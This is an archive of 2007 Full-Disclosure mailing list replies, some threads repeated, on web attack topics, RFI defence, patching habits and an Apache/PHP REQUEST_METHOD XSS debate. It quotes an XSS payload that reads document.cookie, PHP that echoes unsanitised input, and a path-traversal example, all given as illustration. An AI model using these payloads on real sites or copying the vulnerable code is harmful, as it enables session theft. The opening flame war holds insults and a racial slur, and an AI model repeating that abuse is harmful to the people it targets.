Re: [Full-disclosure] Am I missing anything ?
Simon and Joey, Your comments are not contributing anything of value to the list and is causing SNR of the list to go down. I strongly suggest for you to both take your personal banter off-list. I suspect that the rest of the list does not want to hear your personal banter toward each other. This is a security list, not a space for your personal bickering. Grow up. On Monday 23 July 2007 18:48, Simon Smith wrote: Right kid... Can we also agree that you are immature? I mean, we can't lay this to rest unless we come to a compromise. Frankly, I don't feel that it would be a compromise if you didn't come half way in this relationship. While we're at it... Lets also agree that you're a coward, probably fat and lethargic... With no real friends... Who never really gets laid? Yeah I think that about sums it up... ;] On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote: No, I forgot. I now remember, thank you. As long as we agree that you were wrong, I was right, and you are an ignorant jackass who may or may not have had sexual relations with the Oreo named KF, I see no need for this thread to continue. J On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED] wrote: You are right with respect to your RFI comment... But as far as me learning anything, don't count on it. I am after all an ignorant jackass remember? On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote: But I am right, am I not? Just pointing out what everyone else was thinking already :) Anyway, if you are implying I am immature because of my ad homonym, please refer to the following: http://archives.neohapsis.com/archives/fulldisclosure/2007- 01/0380.html You should have learned from KF by now the infosec mantra 'live by the niggerdong, die by the niggerdong' J On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED] wrote: Kid, your posts continue to clearly demonstrate your immaturity. http://www.security-express.com/archives/fulldisclosure/2007- 07/0404.html http://archives.neohapsis.com/archives/fulldisclosure/2007- 07/0372.html http://seclists.org/fulldisclosure/2007/Jul/0369.html http://seclists.org/fulldisclosure/2007/Jul/0402.html Its too bad that you're such a coward man... On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote: Doesn't RFI stand for remote file inclusion you ignorant jackass? J On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote: Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote: Hi All, Just wondered if I am missing anything important. Am planning to give talk on web security. Is there any other technique other than the following I have to speak about ? 1)XSS 2)CSRF 3)SQL Injection 4)AJAX/JSON hijacking 5)HTTP response splitting 6)RFI 7)CRLF 8)MITM Thanks Deepan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Not making enough money? Click here to get free info on medical jobs http://tagline.hushmail.com/fc/Ioyw6h4d93UCWauNfldnj1w6hNlG5GkZoypo FUtlgi140Vz qsFboKh/ -- Click to get a free credit repair consultation, raise your FICO score http://tagline.hushmail.com/fc/Ioyw6h4d7lz4ao5ZGQpPej5hG4nLRpsNA5J5 BBwM8QupVOr uN77l3H/ -- Click for free info on associates degrees and make $150K/ year http://tagline.hushmail.com/fc/Ioyw6h4dDtIwWKRMvTcjIZIDbGjdtasetV45qCTvrr jXRx1 SwjDJMB/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Office 0day
On Sunday 24 June 2007 16:19, [EMAIL PROTECTED] wrote: I can't give detail here Isn't this list called full-disclosure? - in otherwords: If you aren't going to disclose anything: DON'T post that you have something. This list is designed specifically for disclosing (and discussing on the occasion) vulnerabilities, problems, etc to the entire community at once, not just selectively who you choose (i.e. who buys your 0day). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v says second internet exists
Okay, I have a few points I would like to make (assuming if this is true, which I doubt as it is technologically possible to properly implement): 1. The Internet is not owned or run by a single government therefore This is impossible to implement successfully and properly.The Internet as we know it cannot be controlled by a single government. The Internet as we know it is a de-centralized entity, with no central network that controls it all. 2. This current Internet (aka The former ARPAnet) has something We like to call Redundancy and Since the Internet (ARPAnet) is de-centralized, there is no real method of attacking the Internet, you can only attack nodes of the internet, as you take down one link, another comes up to service, take down that link, and yet another comes about. The Internet is more complex than having bunch of home routers linked with single links peered between each other. 3. Switching people over and With new protocols - hm.. What could go wrong here... people's computers failing to being able to communicate with this new Internet because of incompatible protocols as well as operating systems... as well as what would be done to prevent 'crap' from the old internet from leaking over? I suggest stop doning a tin foil hat every time people think of a plan, Especially those without a clue (i.e. cororate execs and government) My appologies to the list for increasing the noise end of the SNR of the list. On Saturday 16 June 2007 16:18, HACK THE GOV wrote: secret information regarding second internet Reader post by: n3td3v Posted on: June 15, 2007, 6:14 AM PDT Story: Coming attractions for history's first cyber-warhttp://news.com.com/2010-7349-6191184.html?tag=tb the government are building a second internet incase this one goes down. not only is the second internet being built incase the first one gets attaced, infact the government plan to eventually switch everyone over to the second internet because its being built with security in mind. the problem with the first internet is, its not very secure and from the governments point of view not very well designed for counter-terrorism eaves dropping. new protocols and processes are being developed on the new internet which will be exclusively used by the u.s government until the roll out in 20 to 30 years time, although the u.s government will cut that public release timeline if a major breakdown of the internet occurs through cyberattacks. in high level meetings with corporate america officials, technical details of how to let corporate security experts switch over to the highly classified second internet project in time of national emergency was disclosed. all parties involved in talks have signed documents to stop them talking about it in pub;lic, although details of the second internet have been obtained by international hackers, who have become firmilar with the project. documents containing the plans for the second internet were downloaded off government computer networks by underground hackers, and therefore the information regarding the second internet project have been leaked. it is unclear how far on in development the project is, due to the papers obtained by illegal authorised entry into u.s government networks was not marked as the same time period as when the papers of the plans were obtained by the illegal means of international hackers. in private the government are trying not to talk about cyber attacks too much so not to over talk the risk to national government and e-commerce interests, but in truth they are only too aware of the threat to their own communications and anti missle systems, therefore a second highly classified internet was advised by top level whitehosue advisors who have consulted with cyber security experts in classified meetings with government officals. the saftey net known as the second internet may save america from certain national economic disaster and attacks to u.s army defense systems in a time of real world war when nuclear and cyber attacks are likely to happen. link: http://news.com.com/5208-7349_3-0.html?forumID=1threadID=28254messageID=2 78411start=-1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
On Friday 08 June 2007 07:12, Thierry Zoller wrote: Dear List, I know we have a World Police but luckily we have no World laws, how about some of you stick to things your supposed to be able to do, security, coding whatever and leave law to those that practise it ? I have yet to see a lawyer good at sec, it depends on - legislation the company resides in - the contract - the form of the message In luxembourg for instance mails labeled as PRIVATE or CONFIDENTIAL are not allowed to be viewed by the company, ALSO as email. Write it in the subject line. To risk breaking my keeping off legal grounds (note: IANAL) With your logic, someone could bring in their home computer, hook it into the network, upload their private files to the server and name a directory CONFIDENTIAL and shove their personal home files in it and nobody is allowed to see what's in it to determine if it's supposed to be there or not because it's named CONFIDENTIAL, thus the person gets free space on the COMPANY server to do whatever they please, even after they leave the company. To be brutally honest, Those marked CONFIDENTIAL emails stick about as much as those lines some corperations make their staff have at the bottom of emails that say essentially If you received this email in error, delete it immediately as it is confidential. It is illegal for you to have this email if it isn't reguarding you. Is it me or are too many people expecting security by good will nowadays? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
On Friday 08 June 2007 08:04, Thierry Zoller wrote: Dear Kradorex, Oh now canada enters the game, somebody from russia pleae also comment on Luxemburgish law, aeessome. It is not logic, it's law (read: positive law). It applies to Mail only, get over it. It gives you legal ground to sue. Can you grasp the concept here? Okay, if you want to go about it that way and use the law in this game:.. In that event: It should therefore be the user's responsibility alone, nobody else's reguardless of departure reason (Fired, quit, etc) to tell the people that the specified mailbox will be terminated. Furthermore, mail should be dropped upon employee's depature, reguardless if the user made those statements to those who he/she communicates with, as there would be nobody else that has legal qualification to touch mail sent to that box, therefore anyone not contacted who continues to send mail to the defunct address, too bad. They may get notified later on, they may not, just continue dropping the mail. As long as the caretaking of defunct mailboxes is under someone else's control, there will be snooping going on So best option: Terminate account, delete all mail in the box and being received for then on, have nobody take care of any defunct mailboxes. That way, nobody could be exposed to privacy invasion lawsuits. End of Problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] You shady bastards.
On Wednesday 06 June 2007 09:47, H D Moore wrote: Hello, Some friends and I were putting together a contact list for the folks attending the Defcon conference this year in Las Vegas. My friend sent out an email, with a large CC list, asking people to respond if they planned on attending. The email was addressed to quite a few people, with one of them being David Maynor. Unfortunately, his old SecureWorks address was used, not his current address with ErrattaSec. Since one of the messages sent to the group contained a URL to our phone numbers and names, I got paranoid and decided to determine whether SecureWorks was still reading email addressed to David Maynor. I sent an email to David's old SecureWorks address, with a subject line promising 0-day, and a link to a non-public URL on the metasploit.com web server (via SSL). Twelve hours later, someone from a Comcast cable modem in Atlanta tried to access the link, and this someone was (confirmed) not David. SecureWorks is based in Atlanta. All times are CDT. I sent the following message last night at 7:02pm. --- From: H D Moore hdm[at]metasploit.com To: David Maynor dmaynor[at]secureworks.com Subject: Zero-day I promised Date: Tue, 5 Jun 2007 19:02:11 -0500 User-Agent: KMail/1.9.3 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: 200706051902.11544.hdm[at]metasploit.com Status: RO X-Status: RSC https://metasploit.com/maynor.tar.gz --- Approximately 12 hours later, the following request shows up in my Apache log file. It looks like someone at SecureWorks is reading email addressed to David and tried to access the link I sent: 71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 This address resolves to: c-71-59-27-152.hsd1.ga.comcast.net The whois information is just the standard Comcast block boilerplate. --- Is this illegal? I could see reading email addressed to him being within the bounds of the law, but it seems like trying to download the 0day link crosses the line. Illegal or not, this is still pretty damned shady. Bastards. -HD I will seldom touch on the legal side but I have a possible scenario: -- If David is no longer at that address, it could be said that his mail account was taken down and the mail sent ended up in a possible catch all box, perhaps someone at SecureWorks was looking through the said catchall mailbox for any interesting mail sent to the secureworks.com domain (i.e. to old employees) - It's quite common for companies and organizations to monitor former employee mailboxes in the event anyone that doesn't have any new contact information to be able to still get somewhere with the old address. And them being a security organization, maybe they proceeded to investigate the link sent. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hashes
To what? Your dog? The universe? an MP3 you downloaded? a program? :P On Tuesday 29 May 2007 03:17, I)ruid wrote: MD5:1db6eff5a4961bba5779349a4932606d SHA1: 80dbb7a782da0d2c09dc4d67750575c08b61e9ac SHA256: da62ba72af7b3a4d886ab61cea6d2177139be67ff564826ab3fd6e09b56ebe06 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] How to protect RFI ??
On Saturday 26 May 2007 16:37, Mark Sec wrote: does any1 how to protect about RFI (Remote file inclusion), and what i need to see over php files ? -mark On a script basis: 1. Parse input for validity 2. Don't allow urls to be unconditionally accepted 3. Don't allow XSS bymaking sure input is genuine and doesn't contain extra characters than are expected. On a server-basis: If it is a server that will be hosting users, I suggest deactivating RFI all-together as users may install scripts that don't check input, Furthermore, disable sockets to prevent users from starting up their own services and/or backdoors, even though there may not be privledged access, if a user gets a shell of some sort, they may be able to get your system roped into a botnet or filestore under the HTTPD's account. However, if it will only be hosting you, then it may be acceptable to leave the default config and make sure scripts behave on a per-script basis as RFI may be eventually useful for you if you parse the include input. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WordPress Community Vulnerable
On Thursday 24 May 2007 12:57, Paul Schmehl wrote: --On Thursday, May 24, 2007 09:44:02 -0500 Steven Adair [EMAIL PROTECTED] wrote: So do you think his two WordPress blogs (I am assuming here..looks a lot like WP, but I'm not pounding out GET requests to verify) were included in this survey that was done? I wonder if he's running a safe version? And as mentioned in one of his blog comments, version reporting isn't always reliable and patches that did not change the extractable version number could have also been applied. In any event, I think WordPress has increasingly become more secure. It's had a small rash of issues a few months back ranging from SQL injection to someone actually backdooring the source, but it's grown up quite a bit. I think someone would be hard pressed to actually come up with the Month of Wordpress bugs. The majority of all other recently reported issues have all from third party add-ons that aren't actually a part of WordPress. Yes, but the point of his post isn't that *Wordpress* is insecure. It's that blog owners are not updating their software to maintain security. While anyone in IT would go doh!, many in the real world might be surprised that the software has to be regularly updated and vigorously maintained to ensure ongoing security. Probably because alot of the said blog owners that neglect upgrading are like any regular computer user, they just want something to work, and if it works, they assume it's okay, therefore, they ignore security upgrades since it would require additional work for something that is not visable to them, as they go by the premise, if it has no new features, Why upgrade? We all know (at least I hope) that security upgrades are something worthwhile because we can see the difference (we can test the exploit on the new version to see if it's patched or nott), whereas a regular user would not. This isn't exactly news for us, but it may well be for the blogosphere in general. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux big bang theory....
On Monday 14 May 2007 01:46, Just1n T1mberlake wrote: scott wrote: Evidently you need more experience in security research: http://projects.info-pull.com/moab/ I believe this should dispel your myth about OSX's invulnerability. Really...did you honestly believe it was invincible? Regards Of course no operating system is invincible when you have full access to the machine. You could just delete all of the files yourself. OSX isn't using all of the tricks like windows does to try and hide executables throughout dlls and other such files. Ever heard of dll hell? No wonder these machines are broken into so often. The point is what would you rather have 1000 windows machines 1000 linux machines or 1000 OSX machines? If you wanted to not be infected I'd be taking the OSX machines for sure, otherwise if you want to get these kind of kernel rootkit tricks of JOquendo or something like rhosts for your life then you would choose one of the linux distributions. What next are you going to virtualise this and run them all on the same host? Frankly, it really doesnt matter what your guest server is running if your host is broken :-) Your points are moot. The only reason OSX is so good security wise, is because the OS doesn't give open administrator access to the users, preventing the dumbness of the uninteligent users from screwing up the OS in the conventional sense, I bet the instant you introduce administrative privs into OSX, you'd get security breaches galore. To put it bluntly: OSX Treats it's users like they're in a playpen, trying not to expose the users to the real world It's the DUMB USERS who are the security risks. NOT the OS the majority of the time. If you left a Windows machine running, with a competent user, it will have a lower risk of becoming infected/rooted than if you parked a clueless user in front of the machine. Same with Linux, park a stupid superuser in front of the machine, you will of coruse you'll get stupid results. However, if you get a competent superuser that only uses root for admin tasks only and doesn't do anything exparamental under root on a production machine, as well as not give users any more permission than they need, you'd be set. So what are we trying to do? protect the OS from what? or protect the users from making idiotic decisions that will screw up their boxes? Remember folks: Computers only operate as good as those who operate them. -- Winning is a habit. Unfortunately, so is losing. - Vincent Lombardi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux big bang theory....
On Monday 14 May 2007 01:46, Just1n T1mberlake wrote: scott wrote: Evidently you need more experience in security research: http://projects.info-pull.com/moab/ I believe this should dispel your myth about OSX's invulnerability. Really...did you honestly believe it was invincible? Regards Of course no operating system is invincible when you have full access to the machine. You could just delete all of the files yourself. OSX isn't using all of the tricks like windows does to try and hide executables throughout dlls and other such files. Ever heard of dll hell? No wonder these machines are broken into so often. The point is what would you rather have 1000 windows machines 1000 linux machines or 1000 OSX machines? If you wanted to not be infected I'd be taking the OSX machines for sure, otherwise if you want to get these kind of kernel rootkit tricks of JOquendo or something like rhosts for your life then you would choose one of the linux distributions. What next are you going to virtualise this and run them all on the same host? Frankly, it really doesnt matter what your guest server is running if your host is broken :-) Your points are moot. The only reason OSX is so good security wise, is because the OS doesn't give open administrator access to the users, preventing the dumbness of the uninteligent users from screwing up the OS in the conventional sense, I bet the instant you introduce administrative privs into OSX, you'd get security breaches galore. To put it bluntly: OSX Treats it's users like they're in a playpen, trying not to expose the users to the real world It's the DUMB USERS who are the security risks. NOT the OS the majority of the time. If you left a Windows machine running, with a competent user, it will have a lower risk of becoming infected/rooted than if you parked a clueless user in front of the machine. Same with Linux, park a stupid superuser in front of the machine, you will of coruse you'll get stupid results. However, if you get a competent superuser that only uses root for admin tasks only and doesn't do anything exparamental under root on a production machine, as well as not give users any more permission than they need, you'd be set. So what are we trying to do? protect the OS from what? or protect the users from making idiotic decisions that will screw up their boxes? Remember folks: Computers only operate as good as those who operate them. -- Winning is a habit. Unfortunately, so is losing. - Vincent Lombardi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux big bang theory....
On Thursday 10 May 2007 19:43, KJKHyperion wrote: J. Oquendo wrote: KJKHyperion wrote: why, Windows machines of course, I'm an attacker, not a fool! If you were a terrorist, what would you rather do? Crash the Twin Towers Crash the dollar There is no such thing as an attacker. All actions, even such an individual's, are driven by economical considerations. With this said, if I were an attacker with economics in mind why would I want to target a machine which has X amount of vendors sifting through the much of malware and viruses when I could spawn off an semi undetectable program and KEEP IT THERE without having to wait for the next best thing. So many misconceptions, so little time. First of all, I meant economical in not just a monetary sense, but the wider sense of balancing conflict in everyone's interest. And well, I got the impression you were thinking of outlandish lose-lose (hence anti-economical) scenarios where some loose cannon shuts down the whole internet, but on second thought I might have been wrong on that account. The idea was that, as effective an enemy-killer crashing the dollar would be, it would prove counterproductive, damaging irreparably the very currency that puts bread on your table and AK-47 on your shoulder. So a purely economical evaluation will bring you to choose, instead, the option causing the lesser evil (i.e. the virtual death of the airline terrorism market). Second, don't kid yourself, the market of security suites for Windows is, at best, an open-air fish marketplace (a terrible stink, a lot of yelling and products with an inherently short freshness timespan the first similarities that come to mind, but I'm sure the mental picture will evoke you many others). I have written Windows attack software for a living, and there's one thing I can write down and undersign in my own blood: Windows cannot be secured. Which is very bad news for the whole industry, Windows being the system with the highest security/feature richness ratio, or in other words the culmination of the state of the art of software engineering as we know it. We lack the semantic tools to even express *what* Windows does, much less how, much less to tell right from wrong [The feeble-minded, confronted with this, retreat in the virtualization hugbox, forgetting the historic lesson that the Titanic sank because the flooding bypassed the (insufficiently fine-grained, at that) waterproof compartments by reaching *over* them -- and let's leave it at that, before runaway metaphorization makes me say something about how Leonardo Di Caprio fits that I will regret] There is nothing, absolutely nothing you can do to isolate applications, or tell malicious from normal behavior. Hell, you can hardly tell apart applications from each other. An application is often just an EXE, but sometimes it's an EXE and a bunch of DLLs, and sometimes one of the DLLs is loaded in all active processes, and sometimes the EXEs are two or more, and sometimes a driver is thrown in the mix, and yet sometimes all you have is a single DLL, a DLL that, sometimes, must *necessarily* be loaded at random times in an arbitrary process (see: IMEs). Not that it matters at all, since the biggest names in security suites fail even the most basic, trivial tests (god is my witness in how often I overengineered some protection routine, only to discover that expensive security suites that shall go unnamed didn't notice the whole trojan in the first place), but it's kind of comforting to know that the problem is unsolvable in principle, now isn't it? So stop shelling out money to the snake oil salesmen or even giving them any credit. When humanity's flagship software product is in such a sorry state, you know there is nothing a random moron like you can do. Let the scientists discover the obvious, let the engineers put it in practice, and until then, for the love of god and all that is holy, _just_ _don't_ _swallow_. [Microsoft being Microsoft, the most important software engineering proof-of-concept, ever, they have developed will probably become a product in ten years from now, if ever, be a huge flop at it and be forgotten soon. It's called Singularity, it's an operating system 99.999% based on .NET, it will make your CPU simpler and faster and your software safer, it's sort of like what Inferno would be if it was actually meant to be used by human beings, *and* if your irrational racist hate of .NET or other kind of short-sightedness makes it seem any less than the... singularity that will take the world by storm and change it forever I see it as, *then* to me you are dead from the inside; http://research.microsoft.com/os/singularity/ for more information] And if you think for a second that Boohoo Linux users are more inclined to be security conscious then you are the fool here. Haha, yes they are, according to their self-assessment. As for
Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability
On Wednesday 25 April 2007 05:35, Vincent Archer wrote: On Tue, 2007-04-24 at 20:03 +0300, عبد الله احمد عنان wrote: This is a case of poor-programming, on the script coder's part, it is not so much a vunerability. In that case, nobody's talking about vulnerabilities on this list, only poor programming. :) Vulnerabilities are results of poor programming. The problem in here is that the programmer assumes that the variables do have a proper value checking done prior to handling off to the script engine. HTTP_METHOD is well defined. One would assume apache has validated the method somehow. If you properly code the scripts, Apache's acceptance of misc data in the method field is not a vulnerability, it is a feature that could be used to make that field extensible with minimal effort. i.e. a script could be designed to send out data based on different methods not listed in the RFC. Unfortunately, this assumption was flawed. That variable only contains what it is sent by apache. it doesn't parse it. nor is it supposed to. However, it (apache) should perform integrity checks, because it has the capacity to do so. True. but Apache should not facilitate lazy programming on script programmers part, the more you baby sit people, the more they will rely on that babysitting and not do it for themselves because they will inherently assume that they have a 'safety net', thus if the script is run on a server without that safety net THAT server gets labeled as vunlnerable when without that script the server is not vulnerable. What are we going to do next? get the HTTPD to valadate the URL-based queries (i.e. script.php?var=value) to prevent unintended input (i.e. viewfile.php?file=../../../file )? This is a SCRIPT problem. not a problem with the HTTPD. This CAN be a vulnerability with individual scripts, however, it is not a vuln with PHP or Apache. Not with PHP. But I would agree with the original programmer that apache is in fault here. Apache should have done the expected work, and validated that the request was standards-compliant. It didn't, and that opens up a huge chasm in which plenty of problems, vulnerabilities and others, may hide. From RFC 2616 Section 5.1.1: The list of methods allowed by a resource can be specified in an Allow header field (section 14.7). The return code of the response always notifies the client whether a method is currently allowed on a resource, since the set of allowed methods can change dynamically. The standards don't say anything about a static list of methods being required. so Apache is compliant there. It is a per-script problem for not parsing the raw data provided to the script properly. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OpenSSH - System Account Enumeration if S/Key is used
On Wednesday 25 April 2007 15:49, Knud Erik Højgaard wrote: But opie not that cool nonetheless, for example there is an off-by-one in accessfile.c lol stop disclosing 0day Wouldn't that defeat the purpose of this list? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability
That would severely cut most extensibility and require further implementations to be hardcoded, thus limiting apache's modular nature. The original RFC would be insufficient for it's list as there are modules such as webdav (as in the previous example) that add to that list of methods Apache isn't just your basic run-of-the-mill GET/POST HTTPD, it is highly extensible, sure, if it WAS a basic one, I could see limiting that list, but it's quite advanced and modular in design. On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote: Hi. I think that server should have a list of valid requests. In fact Apache warns you sometimes that valid requests are: GET/POST/TRACE/OPTIONS. The solution that it just accepts everything as request and protocol makes no sense. What kind of protocol is script? Regards Michal. On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote: Michal Majchrowicz wrote: Hi. I think now we can classify this as flaw in Apache. It accepts requests that simply make no sense. Take a look at this example: scriptalert(document.cookie);/script /test.php scriptalert(document.cookie);/script In some circumstances it may cause XSS vulnerability: ?php echo $_SERVER['REQUEST_METHOD']; echo $_SERVER['SERVER_PROTOCOL']; ? As Kradorex Xeron said, that's a flaw in the script. Apache needs to let arbitrary verbs through to the PHP (or other server extension) otherwise tools like webdav that require additional verbs could not be implemented. It is possibly arguable that it should restrict the verbs to a single alphanumeric string, but it certainly can't be counted on to be just GET/POST etc. Cheers Rich. I am now investigating other possible attacks. Regards Michal Majchrowicz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Richard Moore, Principal Software Engineer, Westpoint Ltd, Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England Tel: +44 161 237 1028 Fax: +44 161 237 1031 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability
That would severely cut most extensibility and require further implementations to be hardcoded, thus limiting apache's modular nature. The original RFC would be insufficient for it's list as there are modules such as webdav (as in the previous example) that add to that list of methods Apache isn't just your basic run-of-the-mill GET/POST HTTPD, it is highly extensible, sure, if it WAS a basic one, I could see limiting that list, but it's quite advanced and modular in design. On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote: Hi. I think that server should have a list of valid requests. In fact Apache warns you sometimes that valid requests are: GET/POST/TRACE/OPTIONS. The solution that it just accepts everything as request and protocol makes no sense. What kind of protocol is script? Regards Michal. On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote: Michal Majchrowicz wrote: Hi. I think now we can classify this as flaw in Apache. It accepts requests that simply make no sense. Take a look at this example: scriptalert(document.cookie);/script /test.php scriptalert(document.cookie);/script In some circumstances it may cause XSS vulnerability: ?php echo $_SERVER['REQUEST_METHOD']; echo $_SERVER['SERVER_PROTOCOL']; ? As Kradorex Xeron said, that's a flaw in the script. Apache needs to let arbitrary verbs through to the PHP (or other server extension) otherwise tools like webdav that require additional verbs could not be implemented. It is possibly arguable that it should restrict the verbs to a single alphanumeric string, but it certainly can't be counted on to be just GET/POST etc. Cheers Rich. I am now investigating other possible attacks. Regards Michal Majchrowicz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Richard Moore, Principal Software Engineer, Westpoint Ltd, Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England Tel: +44 161 237 1028 Fax: +44 161 237 1031 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Illegal Request Handling Possible XSS Vulnerability
That would severely cut most extensibility and require further implementations to be hardcoded, thus limiting apache's modular nature. The original RFC would be insufficient for it's list as there are modules such as webdav (as in the previous example) that add to that list of methods Apache isn't just your basic run-of-the-mill GET/POST HTTPD, it is highly extensible, sure, if it WAS a basic one, I could see limiting that list, but it's quite advanced and modular in design. On Tuesday 24 April 2007 05:18, Michal Majchrowicz wrote: Hi. I think that server should have a list of valid requests. In fact Apache warns you sometimes that valid requests are: GET/POST/TRACE/OPTIONS. The solution that it just accepts everything as request and protocol makes no sense. What kind of protocol is script? Regards Michal. On 4/24/07, Richard Moore [EMAIL PROTECTED] wrote: Michal Majchrowicz wrote: Hi. I think now we can classify this as flaw in Apache. It accepts requests that simply make no sense. Take a look at this example: scriptalert(document.cookie);/script /test.php scriptalert(document.cookie);/script In some circumstances it may cause XSS vulnerability: ?php echo $_SERVER['REQUEST_METHOD']; echo $_SERVER['SERVER_PROTOCOL']; ? As Kradorex Xeron said, that's a flaw in the script. Apache needs to let arbitrary verbs through to the PHP (or other server extension) otherwise tools like webdav that require additional verbs could not be implemented. It is possibly arguable that it should restrict the verbs to a single alphanumeric string, but it certainly can't be counted on to be just GET/POST etc. Cheers Rich. I am now investigating other possible attacks. Regards Michal Majchrowicz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Richard Moore, Principal Software Engineer, Westpoint Ltd, Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England Tel: +44 161 237 1028 Fax: +44 161 237 1031 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability
This isn't only a problem with that specific variable, it is also a problem with any user-defined variable, i.e. ? echo $_GET['page']; ? can be XSS'd with script.php?page=bblah/b However: ? echo htmlentities($_GET['page']); ? is much harder to exploit to inject malicious code. I beleive the following: If your program/script accepts any user input, never assume something else will block the exploit of your program, always impliment sanity checks, and/or strip nonsense out of the input. On Monday 23 April 2007 18:21, Michał Majchrowicz wrote: I agree. But (as a programmer) would you assume that there can be such things in the REQUEST_METHOD? The flaw is that Apache accepts anything after the valid request i.e. GET. There should be an error the the request was not correct. Regards Michal. On 4/24/07, Kradorex Xeron [EMAIL PROTECTED] wrote: This is a case of poor-programming, on the script coder's part, it is not so much a vunerability. That variable only contains what it is sent by apache. it doesn't parse it. nor is it supposed to. If you want to ensure there is no XSS going on, parse the variable, escape characters, etc as it IS user input. This CAN be a vulnerability with individual scripts, however, it is not a vuln with PHP or Apache. On Monday 23 April 2007 17:31, Michal Majchrowicz wrote: There exist a flaw in a way how Apache and php combination handle the $_SERVER array. If the programmer writes scrip like this: ?php echo $_SERVER['REQUEST_METHOD']; ? He will assume that REQUEST_METHOD can only by: 